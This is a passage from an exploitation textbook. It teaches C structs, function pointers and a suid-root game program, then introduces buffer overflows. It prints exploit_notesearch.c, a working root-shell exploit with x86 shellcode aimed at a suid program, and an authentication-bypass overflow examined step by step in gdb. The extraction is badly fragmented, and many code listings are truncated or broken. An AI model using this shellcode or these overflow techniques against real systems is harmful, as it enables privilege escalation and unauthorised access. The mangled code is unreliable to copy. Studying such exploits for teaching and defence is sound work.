jose@hacking:/home/reader/booksrc $
...
This
means that value is added to all notes written with notetaker, and only notes
with a matching user ID will be displayed by the notesearch program
...
/notetaker "This is another note for the reader user"
[DEBUG] buffer @ 0x804a008: 'This is another note for the reader user'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved
...
/notesearch
[DEBUG] found a 34 byte note for user id 999
this is a test of multiuser notes
[DEBUG] found a 41 byte note for user id 999
This is another note for the reader user
-------[ end of note data ]-------
reader@hacking:~/booksrc $

Similarly, all notes for the user reader have the user ID 999 attached to
them
...
This is very similar to how the /etc/passwd file stores
user information for all users, yet programs like chsh and passwd allow any user
to change his own shell or password
...
In C, structs are variables that can contain many other variables
...

A simple example will suffice for now
...
h
...

struct tm {
    int tm_sec;   /* seconds */
    int tm_min;   /* minutes */
    int tm_hour;  /* hours */
    int tm_mday;  /* day of the month */
    int tm_mon;   /* month */
    int tm_year;  /* year */
    int tm_wday;  /* day of the week */
    int tm_yday;  /* day in the year */
    int tm_isdst; /* daylight saving time */
};

After this struct is defined, struct tm becomes a usable variable type, which
can be used to declare variables and pointers with the data type of the tm struct
...
c program demonstrates this
...
h is included,
the tm struct is defined, which is later used to declare the current_time and
time_ptr variables
...
c
#include ...
h>
int main() {
long int seconds_since_epoch;
struct tm current_time, *time_ptr;
int hour, minute, second, day, month, year;
seconds_since_epoch = time(0); // Pass time a null pointer as argument
...

localtime_r(&seconds_since_epoch, time_ptr);
// Three different ways to access struct elements:
hour = current_time
...
Time on Unix systems is kept relative to this rather arbitrary point in
time, which is also known as the epoch
...
The pointer time_ptr has already been set to the address
of current_time, an empty tm struct
...
The elements of structs can be accessed in
three different ways; the first two are the proper ways to access struct elements,
and the third is a hacked solution
...
Therefore, current_time
...
Pointers to structs are often used,
since it is much more efficient to pass a four-byte pointer than an entire data
structure
...
When using a struct pointer like time_ptr, struct elements can be
similarly accessed by the struct element’s name, but using a series of characters that looks like an arrow pointing right
...
The
seconds could be accessed via either of these proper methods, using the
tm_sec element or the tm struct, but a third method is used
...
c
reader@hacking:~/booksrc $
...
out
time() - seconds since epoch: 1189311588
Current time is: 04:19:48
reader@hacking:~/booksrc $
...
out
time() - seconds since epoch: 1189311600
Current time is: 04:20:00
reader@hacking:~/booksrc $

The program works as expected, but how are the seconds being accessed
in the tm struct? Remember that in the end, it’s all just memory
...
In the line second = *((int *) time_ptr), the variable time_ptr
is typecast from a tm struct pointer to an integer pointer
...
Since
the address to the tm struct also points to the first element of this struct, this
will retrieve the integer value for tm_sec in the struct
...
c code (time_example2
...
This shows that the elements of tm struct are right next to each
other in memory
...

time_example2
...
h>
#include ...

printf("\n");
}
printf("\n");
}
int main() {
long int seconds_since_epoch;
struct tm current_time, *time_ptr;
int hour, minute, second, i, *int_ptr;
seconds_since_epoch = time(0); // Pass time a null pointer as argument
...

localtime_r(&seconds_since_epoch, time_ptr);
// Three different ways to access struct elements:
hour = current_time
...

int_ptr = (int *) time_ptr;
for(i=0; i < 3; i++) {
printf("int_ptr @ 0x%08x : %d\n", int_ptr, *int_ptr);
int_ptr++; // Adding 1 to int_ptr adds 4 to the address,
} // since an int is 4 bytes in size
...
c are as follows
...
c
reader@hacking:~/booksrc $
...
out
time() - seconds since epoch: 1189311744
Current time is: 04:22:24
bytes of struct located at 0xbffff7f0
18 00 00 00 16 00 00 00 04 00 00 00 09 00 00 00
08 00 00 00 6b 00 00 00 00 00 00 00 fb 00 00 00
00 00 00 00 00 00 00 00 28 a0 04 08
int_ptr @ 0xbffff7f0 : 24
int_ptr @ 0xbffff7f4 : 22
int_ptr @ 0xbffff7f8 : 4
reader@hacking:~/booksrc $
While struct memory can be accessed this way, assumptions are made
about the type of variables in the struct and the lack of any padding between
variables
...

0x285

Function Pointers

A pointer simply contains a memory address and is given a data type that
describes where it points
...
The funcptr_example
...

funcptr_example
...
h>
int func_one() {
printf("This is function one\n");
return 1;
}
int func_two() {
printf("This is function two\n");
return 2;
}
int main() {
int value;
int (*function_ptr) ();
function_ptr = func_one;
printf("function_ptr is 0x%08x\n", function_ptr);
value = function_ptr();
printf("value returned was %d\n", value);
function_ptr = func_two;
printf("function_ptr is 0x%08x\n", function_ptr);
value = function_ptr();
printf("value returned was %d\n", value);
}

In this program, a function pointer aptly named function_ptr is declared
in main()
...
The output below shows
the compilation and execution of this source code
...
c
reader@hacking:~/booksrc $
...
out
function_ptr is 0x08048374
This is function one
value returned was 1

function_ptr is 0x0804838d
This is function two
value returned was 2
reader@hacking:~/booksrc $

0x286

Pseudo-random Numbers

Since computers are deterministic machines, it is impossible for them to
produce truly random numbers
...
The pseudo-random number generator functions fill this need
by generating a stream of numbers that is pseudo-random
...
Deterministic machines cannot produce true randomness, but if
the seed value of the pseudo-random generation function isn’t known, the
sequence will seem random
...
These functions and
RAND_MAX are defined in stdlib
...
While the numbers rand() returns will appear
to be random, they are dependent on the seed value provided to srand()
...
One common
practice is to use the number of seconds since epoch (returned from the time()
function) as the seed
...
c program demonstrates this
technique
...
c
#include ...
h>
int main() {
int i;
printf("RAND_MAX is %u\n", RAND_MAX);
srand(time(0));
printf("random values from 0 to RAND_MAX\n");
for(i=0; i < 8; i++)
printf("%d\n", rand());
printf("random values from 1 to 20\n");
for(i=0; i < 8; i++)
printf("%d\n", (rand()%20)+1);
}

Notice how the modulus operator is used to obtain random values from
1 to 20
...
c
reader@hacking:~/booksrc $
...
out
RAND_MAX is 2147483647
random values from 0 to RAND_MAX
815015288
1315541117
2080969327
450538726
710528035
907694519
1525415338
1843056422
random values from 1 to 20
2
3
8
5
9
1
4
20
reader@hacking:~/booksrc $
...
out
RAND_MAX is 2147483647
random values from 0 to RAND_MAX
678789658
577505284
1472754734
2134715072
1227404380
1746681907
341911720
93522744
random values from 1 to 20
6
16
12
19
8
19
2
1
reader@hacking:~/booksrc $

The program’s output just displays random numbers
...

0x287

A Game of Chance

The final program in this section is a set of games of chance that use many
of the concepts we’ve discussed
...
It has three different
game functions, which are called using a single global function pointer, and
it uses structs to hold data for the player, which is saved in a file
...
The game_of_chance
...

game_of_chance
...
h>
...
h>
...
h>
...
h"

#define DATAFILE "/var/chance
...

if(get_player_data() == -1)
register_new_player();

// Try to read player data from file
...

while(choice != 7) {
printf("-=[ Game of Chance Menu ]=-\n");
printf("1 - Play the Pick a Number game\n");
printf("2 - Play the No Match Dealer game\n");
printf("3 - Play the Find the Ace game\n");
printf("4 - View current high score\n");
printf("5 - Change your user name\n");

printf("6 - Reset your account at 100 credits\n");
printf("7 - Quit\n");
printf("[Name: %s]\n", player
...
credits);
scanf("%d", &choice);
if((choice < 1) || (choice > 7))
printf("\n[!!] The number %d is an invalid selection
...

if(choice != last_game) { // If the function ptr isn't set
if(choice == 1) // then point it at the selected game
player
...
current_game = dealer_no_match;
else
player
...

}
play_the_game(); // Play the game
...
\n\n");
}
else if (choice == 6) {
printf("\nYour account has been reset with 100 credits
...
credits = 100;
}
}
update_player_data();
printf("\nThanks for playing! Bye
...
It returns -1 if it is unable to find player
// data for the current uid
...

while(entry
...

read_bytes = read(fd, &entry, sizeof(struct user)); // Keep reading
...

if(read_bytes < sizeof(struct user)) // This means that the end of file was reached
...

return 1; // Return a success
...

// It will create a new player account and append it to the file
...
uid = getuid();
player
...
credits = 100;
fd = open(DATAFILE, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
if(fd == -1)
fatal("in register_new_player() while opening file");
write(fd, &player, sizeof(struct user));
close(fd);
printf("\nWelcome to the Game of Chance %s
...
name);
printf("You have been given %u credits
...
credits);
}
// This function writes the current player data to the file
...

void update_player_data() {
int fd, i, read_uid;
char burned_byte;
fd = open(DATAFILE, O_RDWR);
if(fd == -1) // If open fails here, something is really wrong
...

while(read_uid != player
...

for(i=0; i < sizeof(struct user) - 4; i++) // Read through the
read(fd, &burned_byte, 1); // rest of that struct
...

}
write(fd, &(player
...

write(fd, &(player
...

write(fd, &(player
...

close(fd);
}
// This function will display the current high score and
// the name of the person who set that high score
...

if(entry
...
highscore; // set top_score to that score
strcpy(top_name, entry
...

}
}
close(fd);
if(top_score > player
...
highscore);
printf("======================================================\n\n");
}
// This function simply awards the jackpot for the Pick a Number game
...
credits += 100;
}
// This function is used to input the player name, since
// scanf("%s", &whatever) will stop input at the first space
...

name_ptr = (char *) &(player
...

*name_ptr = input_char; // Put the input char into name field
...

name_ptr++; // Increment the name pointer
...

}
// This function prints the 3 cards for the Find the Ace game
// It expects a message to display, a pointer to ...
// and the card the user has picked as input
...

void print_cards(char *message, char *cards, int ...
int i;
...
_
...
_
...
_
...
It expects the available credits and the
// previous wager as arguments
...
The function
// returns -1 if the wager is too big or too little, and it returns
// the wager amount otherwise
...

printf("Nice try, but you must wager a positive number!\n");
return -1;
}
total_wager = previous_wager + wager;
if(total_wager > available_credits) { // Confirm available credits
printf("Your total wager of %d is more than you have!\n", total_wager);
printf("You only have %d available credits, try again
...
It also writes the new credit totals to file
// after each game is played
...
current_game);
if(player
...
credits > player
...
highscore = player
...

printf("\nYou now have %u credits\n", player
...

printf("Would you like to play again? (y/n) ");
selection = '\n';
while(selection == '\n') // Flush any extra newlines
...

}
}
// This function is the Pick a Number game
...

int pick_a_number() {
int pick, winning_number;
printf("\n####### Pick a Number ######\n");
printf("This game costs 10 credits to play
...

if(player
...
That's not enough to play!\n\n", player
...
credits -= 10; // Deduct 10 credits
...
\n");
printf("Pick a number between 1 and 20: ");
scanf("%d", &pick);
printf("The winning number is %d\n", winning_number);
if(pick == winning_number)
jackpot();
else
printf("Sorry, you didn't win
...

// It returns -1 if the player has 0 credits
...
\n");
printf("The dealer will deal out 16 random numbers between 0 and 99
...
credits == 0) {
printf("You don't have any credits to wager!\n\n");
return -1;
}
while(wager == -1)
wager = take_wager(player
...

printf("%2d\t", numbers[i]);
if(i%8 == 7) // Print a line break every 8 numbers
...

j = i + 1;
while(j < 16) {
if(numbers[i] == numbers[j])
match = numbers[i];
j++;
}
}
if(match != -1) {
printf("The dealer matched the number %d!\n", match);
printf("You lose %d credits
...
credits -= wager;
} else {
printf("There were no matches! You win %d credits!\n", wager);
player
...

// It returns -1 if the player has 0 credits
...

printf("******* Find the Ace *******\n");
printf("In this game, you can wager up to all of your credits
...
\n");
printf("If you find the ace, you will win your wager
...
\n");
printf("At this point, you may either select a different card or\n");
printf("increase your wager
...
credits == 0) {
printf("You don't have any credits to wager!\n\n");
return -1;
}
while(wager_one == -1) // Loop until valid wager is made
...
credits, 0);
print_cards("Dealing cards", cards, -1);
pick = -1;
while((pick < 1) || (pick > 3)) { // Loop until valid pick is made
...

i=0;
while(i == ace || i == pick) // Keep looping until
i++; // we find a valid queen to reveal
...

printf("Would you like to:\n[c]hange your pick\tor\t[i]ncrease your wager?\n");
printf("Select c or i: ");
choice_two = '\n';
while(choice_two == '\n') // Flush extra newlines
...

invalid_choice=0; // This is a valid choice
...

wager_two = take_wager(player
...

i = invalid_choice = 0; // Valid choice
while(i == pick || cards[i] == 'Q') // Loop until the other card
i++; // is found,
pick = i; // and then swap pick
...

if(ace == i)
cards[i] = 'A';
else
cards[i] = 'Q';
}
print_cards("End result", cards, pick);
if(pick == ace) { // Handle win
...
credits += wager_one;
if(wager_two != -1) {
printf("and an additional %d credits from your second wager!\n", wager_two);
player
...

printf("You have lost %d credits from your first wager\n", wager_one);
player
...
credits -= wager_two;
}
}
return 0;
}

Since this is a multi-user program that writes to a file in the /var directory, it must be suid root
...
c
sudo chown root:root
...
/game_of_chance

...

You have been given 100 credits
...
Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!
10 credits have been deducted from your account
...

Sorry, you didn't win
...

Would you like to play again? (y/n) n
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 90 credits] -> 2
[DEBUG] current_game pointer @ 0x08048f61
::::::: No Match Dealer :::::::
In this game you can wager up to all of your credits
...

If there are no matches among them, you double your money!
How many of your 90 credits would you like to wager? 30
::: Dealing out 16 random numbers :::
88      68      82      51      21      73      80      50
11      64      78      85      39      42      40      95
There were no matches! You win 30 credits!
You now have 120 credits
Would you like to play again? (y/n) n
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 120 credits] -> 3
[DEBUG] current_game pointer @ 0x0804914c
******* Find the Ace *******
In this game you can wager up to all of your credits
...

If you find the ace, you will win your wager
...

At this point you may either select a different card or
increase your wager
...
_
...
_
...
_
...
_
...
_
...
_
...

*** End result ***

...

...

...

Cards: |A| |Q| |Q|
        ^-- your pick
You have won 50 credits from your first wager
...

Would you like to play again? (y/n) n
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit

50

[Name: Jon Erickson]
[You have 170 credits] -> 4

====================| HIGH SCORE |====================
You currently have the high score of 170 credits!
======================================================
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 170 credits] -> 7
Thanks for playing! Bye
...
/game_of_chance
-=-={ New Player Registration }=-=-
Enter your name: Jose Ronnick
Welcome to the Game of Chance Jose Ronnick
...

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jose Ronnick]
[You have 100 credits] -> 4
====================| HIGH SCORE |====================
Jon Erickson has the high score of 170
...

jose@hacking:~/booksrc $ exit
exit
reader@hacking:~/booksrc $

Play around with this program a little bit
...
Many people have difficulty understanding
this truth—that’s why it’s counterintuitive
...

0x300
EXPLOITATION

Program exploitation is a staple of hacking
...

Exploiting a program is simply a clever way of getting
the computer to do what you want it to do, even if the
currently running program was designed to prevent that action
...
It takes a creative mind to find these holes and
to write programs that compensate for them
...

A program can only do what it’s programmed to do, to the letter of the law
...
This principle can be explained with a joke:
A man is walking through the woods, and he finds a magic lamp on
the ground
...
The genie thanks the man for
freeing him, and offers to grant him three wishes
...

“First,” says the man, “I want a billion dollars
...

The man is wide eyed in amazement and continues, “Next, I want
a Ferrari
...

The man continues, “Finally, I want to be irresistible to women
...

Just as the man’s final wish was granted based on what he said, rather
than what he was thinking, a program will follow its instructions exactly, and
the results aren’t always what the programmer intended
...

Programmers are human, and sometimes what they write isn’t exactly
what they mean
...
As the name implies, it’s an error where the programmer has
miscounted by one
...
This
type of off-by-one error is commonly called a fencepost error, and it occurs when a
programmer mistakenly counts items instead of spaces between items, or
vice versa
...
If N = 5 and M = 17,
how many items are there to process? The obvious answer is M - N, or 17 - 5 = 12
items
...
This may seem counterintuitive at first glance, because it is, and
that’s exactly why these errors happen
...
However, when the program is fed
the input that makes the effects of the error manifest, the consequences of the
error can have an avalanche effect on the rest of the program logic
...

One classic example of this is OpenSSH, which is meant to be a secure
terminal communication program suite, designed to replace insecure and
unencrypted services such as telnet, rsh, and rcp
...
Specifically, the code included an if statement that read:
if (id < 0 || id > channels_alloc) {

It should have been
if (id < 0 || id >= channels_alloc) {

In plain English, the code reads “If the ID is less than 0 or the ID is greater
than the channels allocated, do the following stuff,” when it should have been “If the
ID is less than 0 or the ID is greater than or equal to the channels allocated, do the
following stuff”
...
This type of functionality certainly wasn’t
what the programmers had intended for a secure program like OpenSSH,
but a computer can only do what it’s told
...
While this
increase in functionality makes the program more marketable and increases
its value, it also increases the program’s complexity, which increases the
chances of an oversight
...
In order to accomplish this,
the program must allow users to read, write, and execute programs and files
within certain directories; however, this functionality must be limited to those
particular directories
...
To
prevent this situation, the program has path-checking code designed to
prevent users from using the backslash character to traverse backward through
the directory tree and enter other directories
...
Unicode is a double-byte
character set designed to provide characters for every language, including
Chinese and Arabic
...
This additional complexity
means that there are now multiple representations of the backslash character
...
So by using
%5c instead of \, it was indeed possible to traverse directories, allowing
the aforementioned security dangers
...

A related example of this letter-of-the-law principle used outside the
realm of computer programming is the LaMacchia Loophole
...

Near the end of 1993, a 21-year-old computer hacker and student at MIT
named David LaMacchia set up a bulletin board system called Cynosure for
the purposes of software piracy
...
The service was only
online for about six weeks, but it generated heavy network traffic worldwide,
which eventually attracted the attention of university and federal authorities
...
However,
the charge was dismissed because what LaMacchia was alleged to have done
wasn’t criminal conduct under the Copyright Act, since the infringement
was not for the purpose of commercial advantage or private financial gain
...

(Congress closed this loophole in 1997 with the No Electronic Theft Act
...
The abstract concepts of
hacking transcend computing and can be applied to many other aspects
of life that involve complex systems
...
However, there are some common mistakes that can be exploited
in ways that aren’t so obvious
...

Because the same type of mistake is made in many different places, generalized exploit techniques have evolved to take advantage of these mistakes, and
they can be used in a variety of situations
...
These include
common exploit techniques like buffer overflows as well as less-common
methods like format string exploits
...

This type of process hijacking is known as execution of arbitrary code, since the
hacker can cause a program to do pretty much anything he or she wants it to
...
Under
normal conditions, these unexpected cases cause the program to crash—
metaphorically driving the execution flow off a cliff
...

0x320

Buffer Overflows
Buffer overflow vulnerabilities have been around since the early days of computers and still exist today
...

C is a high-level programming language, but it assumes that the
programmer is responsible for data integrity
...
Also, this would remove a
significant level of control from the programmer and complicate the
language
...
This
means that once a variable is allocated memory, there are no built-in safeguards to ensure that the contents of a variable fit into the allocated memory
space
...
This is known as a
buffer overrun or buffer overflow, since the extra two bytes of data will overflow
and spill out of the allocated memory, overwriting whatever happens to
come next
...

The overflow_example
...

overflow_example
...
h>
#include ...
*/
strcpy(buffer_two, "two"); /* Put "two" into buffer_two
...
*/
printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value);
}


By now, you should be able to read the source code above and figure out
what the program does
...

reader@hacking:~/booksrc $ gcc -o overflow_example overflow_example
...
/overflow_example 1234567890
[BEFORE] buffer_two is at 0xbffff7f0 and contains 'two'
[BEFORE] buffer_one is at 0xbffff7f8 and contains 'one'
[BEFORE] value is at 0xbffff804 and is 5 (0x00000005)
[STRCPY] copying 10 bytes into buffer_two
[AFTER] buffer_two is at 0xbffff7f0 and contains '1234567890'
[AFTER] buffer_one is at 0xbffff7f8 and contains '90'
[AFTER] value is at 0xbffff804 and is 5 (0x00000005)
reader@hacking:~/booksrc $

Notice that buffer_one is located directly after buffer_two in memory, so
when ten bytes are copied into buffer_two, the last two bytes of 90 overflow
into buffer_one and overwrite whatever was there
...

reader@hacking:~/booksrc $
...
The programmer’s
mistake is one of omission—there should be a length check or restriction on
the user-supplied input
...
In fact, the notesearch
...
You might not have noticed this until right now, even if you
were already familiar with C
...
/notesearch AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-------[ end of note data ]-------
Segmentation fault
reader@hacking:~/booksrc $


Program crashes are annoying, but in the hands of a hacker they can
become downright dangerous
...
The exploit_notesearch
...

exploit_notesearch
...
h>
#include ...
h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // Zero out the new memory
...
/notesearch \'"); // Start command buffer
...

if(argc > 1) // Set offset
...

for(i=0; i < 160; i+=4) // Fill buffer with return address
...

memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // Run exploit
...
It uses string
functions to do this: strlen() to get the current length of the string (to position
the buffer pointer) and strcat() to concatenate the closing single quote to the
end
...

The buffer that is generated between the single quotes is the real meat of the
exploit
...
Watch
what a controlled crash can do
...
c
reader@hacking:~/booksrc $
...
out
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
sh-3
...
This is an example of a stack-based buffer
overflow exploit
...
The auth_overflow
...

auth_overflow
...
h>
#include ...
h>
int check_authentication(char *password) {
   int auth_flag = 0;
   char password_buffer[16];

   strcpy(password_buffer, password);

   if(strcmp(password_buffer, "brillig") == 0)
      auth_flag = 1;
   if(strcmp(password_buffer, "outgrabe") == 0)
      auth_flag = 1;

   return auth_flag;
}

int main(int argc, char *argv[]) {
   if(argc < 2) {
      printf("Usage: %s <password>\n", argv[0]);
      exit(0);
   }
   if(check_authentication(argv[1])) {
      printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
printf("
Access Granted
...
\n");
}
}

This example program accepts a password as its only command-line
argument and then calls a check_authentication() function
...
If either of these passwords is used, the function returns 1, which
grants access
...
Use the -g option when you do compile
it, though, since we will be debugging this later
...
c
reader@hacking:~/booksrc $
...
/auth_overflow
reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $
...

-=-=-=-=-=-=-=-=-=-=-=-=-=-
reader@hacking:~/booksrc $
...

-=-=-=-=-=-=-=-=-=-=-=-=-=-
reader@hacking:~/booksrc $

So far, everything works as the source code says it should
...
But an
overflow can lead to unexpected and even contradictory behavior, allowing
access without a proper password
...
/auth_overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Access Granted
...

reader@hacking:~/booksrc $ gdb -q
...
so
...

(gdb) list 1
1
#include ...
h>
3
#include ...
c, line 9
...
c, line 16
...
When the program is run,
execution will pause at these breakpoints and give us a chance to examine
memory
...
c:9
9          strcpy(password_buffer, password);
(gdb) x/s password_buffer
0xbffff7a0:      ")????o??????)\205\004\b?o??p???????"
(gdb) x/x &auth_flag
0xbffff7bc:     0x00000000
(gdb) print 0xbffff7bc - 0xbffff7a0
$1 = 28
(gdb) x/16xw password_buffer
0xbffff7a0:     0xb7f9f729      0xb7fd6ff4      0xbffff7d8      0x08048529
0xbffff7b0:     0xb7fd6ff4      0xbffff870      0xbffff7d8      0x00000000
0xbffff7c0:     0xb7ff47b0      0x08048510      0xbffff7d8      0x080484bb
0xbffff7d0:     0xbffff9af      0x08048510      0xbffff838      0xb7eafebc
(gdb)

The first breakpoint is before the strcpy() happens
...
By examining the
address of the auth_flag variable, we can see both its location at 0xbffff7bc
and its value of 0
...
This relationship
can also be seen in a block of memory starting at password_buffer
...


(gdb) continue
Continuing
...
c:16
16         return auth_flag;
(gdb) x/s password_buffer
0xbffff7a0:      'A' <repeats 30 times>
(gdb) x/x &auth_flag
0xbffff7bc:     0x00004141
(gdb) x/16xw password_buffer
0xbffff7a0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7b0:     0x41414141      0x41414141      0x41414141      0x00004141
0xbffff7c0:     0xb7ff47b0      0x08048510      0xbffff7d8      0x080484bb
0xbffff7d0:     0xbffff9af      0x08048510      0xbffff838      0xb7eafebc
(gdb) x/4cb &auth_flag
0xbffff7bc:     65 'A'  65 'A'  0 '\0'  0 '\0'
(gdb) x/dw &auth_flag
0xbffff7bc:     16705
(gdb)

Continuing to the next breakpoint found after the strcpy(), these memory
locations are examined again
...
The value of 0x00004141 might look backward
again, but remember that x86 has little-endian architecture, so it’s supposed to
look that way
...
Ultimately, the program will treat this
value as an integer, with a value of 16705
...

-=-=-=-=-=-=-=-=-=-=-=-=-=-
Access Granted
...

(gdb)

After the overflow, the check_authentication() function will return 16705
instead of 0
...
In this example, the auth_flag variable is the execution control point,
since overwriting this value is the source of the control
...
In auth_overflow2
...

(Changes to auth_overflow
...
)


auth_overflow2
...
h>
#include ...
h>
int check_authentication(char *password) {
   char password_buffer[16];
   int auth_flag = 0;

   strcpy(password_buffer, password);

   if(strcmp(password_buffer, "brillig") == 0)
      auth_flag = 1;
   if(strcmp(password_buffer, "outgrabe") == 0)
      auth_flag = 1;

   return auth_flag;
}

int main(int argc, char *argv[]) {
   if(argc < 2) {
      printf("Usage: %s <password>\n", argv[0]);
      exit(0);
   }
   if(check_authentication(argv[1])) {
      printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
printf("
Access Granted
...
\n");
}
}

This simple change puts the auth_flag variable before the password_buffer
in memory
...

reader@hacking:~/booksrc $ gcc -g auth_overflow2
...
/a
...
so
...

(gdb) list 1
1
#include ...
h>
3
#include ...
c, line 9
...
c, line 16
...
out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 1, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>) at
auth_overflow2
...
This means auth_flag can never be overwritten by an overflow in
password_buffer
...

Breakpoint 2, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>)
at auth_overflow2
...
But another execution control point does exist,
even though you can’t see it in the C code
...
This memory is integral to the
operation of all programs, so it exists in all programs, and when it’s overwritten, it usually results in a program crash
...

Program received signal SIGSEGV, Segmentation fault
...
The stack is a FILO data structure used to
maintain execution flow and context for local variables during function calls
...
Each stack frame contains the local variables for that
function and a return address so EIP can be
restored
...
All of this is built
into the architecture and is usually handled by
the compiler, not the programmer
...
In this frame
are the local variables, a return address, and the
function’s arguments

[Figure: stack layout, with labels for the return_value variable, the saved frame pointer (SFP), and main()’s stack frame]

reader@hacking:~/booksrc $ gcc -g auth_overflow2
...
/a
...
so
...

(gdb) list 1
1
#include ...
h>
3
#include ...
\n");
27
printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
28
} else {
29
printf("\nAccess Denied
...
c, line 24
...
c, line 9
...
c, line 16
...
out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 1, main (argc=2, argv=0xbffff874) at auth_overflow2
...
At this point, the stack pointer register (ESP) is 0xbffff7e0, and the
top of the stack is shown
...
Continuing to the next breakpoint inside check_authentication(), the output below
shows ESP is smaller as it moves up the list of memory to make room for
check_authentication()’s stack frame (shown in bold), which is now on the
stack
...


(gdb) c
Continuing
...
c:9
9          strcpy(password_buffer, password);
(gdb) i r esp
esp            0xbffff7a0       0xbffff7a0
(gdb) x/32xw $esp
0xbffff7a0:     0x00000000      0x08049744      0xbffff7b8      0x080482d9
0xbffff7b0:     0xb7f9f729      0xb7fd6ff4      0xbffff7e8      0x00000000
0xbffff7c0:     0xb7fd6ff4      0xbffff880      0xbffff7e8      0xb7fd6ff4
0xbffff7d0:     0xb7ff47b0      0x08048510      0xbffff7e8      0x080484bb
0xbffff7e0:     0xbffff9b7      0x08048510      0xbffff848      0xb7eafebc
0xbffff7f0:     0x00000002      0xbffff874      0xbffff880      0xb8001898
0xbffff800:     0x00000000      0x00000001      0x00000001      0x00000000
0xbffff810:     0xb7fd6ff4      0xb8000ce0      0x00000000      0xbffff848
(gdb) p 0xbffff7e0 - 0xbffff7a0
$1 = 64
(gdb) x/s password_buffer
0xbffff7c0:      "?o??\200????????o???G??\020\205\004\b?????\204\004\b????\020\205\004\bH???????\002"
(gdb) x/x &auth_flag
0xbffff7bc:     0x00000000
(gdb)

Continuing to the second breakpoint in check_authentication(), a stack
frame (shown in bold) is pushed onto the stack when the function is called
...
The size and structure of a stack
frame can vary greatly, depending on the function and certain compiler
optimizations
...
The local stack variables, auth_flag and
password_buffer, are shown at their respective memory locations in the stack
frame
...

The stack frame contains more than just the local variables and padding
...

First, the memory saved for the local variables is shown in italic
...
The next few values on the stack are just
padding the compiler threw in, plus something called the saved frame pointer
...
The value 0x080484bb is the return address of the stack frame, and the
address 0xbffff9b7 is a pointer to a string containing 30 As
...

(gdb) x/32xw $esp
0xbffff7a0:     0x00000000      0x08049744      0xbffff7b8      0x080482d9
0xbffff7b0:     0xb7f9f729      0xb7fd6ff4      0xbffff7e8      0x00000000
0xbffff7c0:     0xb7fd6ff4      0xbffff880      0xbffff7e8      0xb7fd6ff4
0xbffff7d0:     0xb7ff47b0      0x08048510      0xbffff7e8      0x080484bb
0xbffff7e0:     0xbffff9b7      0x08048510      0xbffff848      0xb7eafebc
0xbffff7f0:     0x00000002      0xbffff874      0xbffff880      0xb8001898
0xbffff800:     0x00000000      0x00000001      0x00000001      0x00000000
0xbffff810:     0xb7fd6ff4      0xb8000ce0      0x00000000      0xbffff848
(gdb) x/32xb 0xbffff9b7
0xbffff9b7:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xbffff9bf:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xbffff9c7:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xbffff9cf:     0x41    0x41    0x41    0x41    0x41    0x41    0x00    0x53
(gdb) x/s 0xbffff9b7
0xbffff9b7:      'A' <repeats 30 times>
(gdb)

The return address in a stack frame can be located by understanding
how the stack frame is created
...

(gdb) disass main
Dump of assembler code for function main:
0x08048474 <main+0>:    push   ebp
0x08048475 <main+1>:    mov    ebp,esp
0x08048477 <main+3>:    sub    esp,0x8
0x0804847a <main+6>:    and    esp,0xfffffff0
0x0804847d <main+9>:    mov    eax,0x0
0x08048482 <main+14>:   sub    esp,eax
0x08048484 <main+16>:   cmp    DWORD PTR [ebp+8],0x1
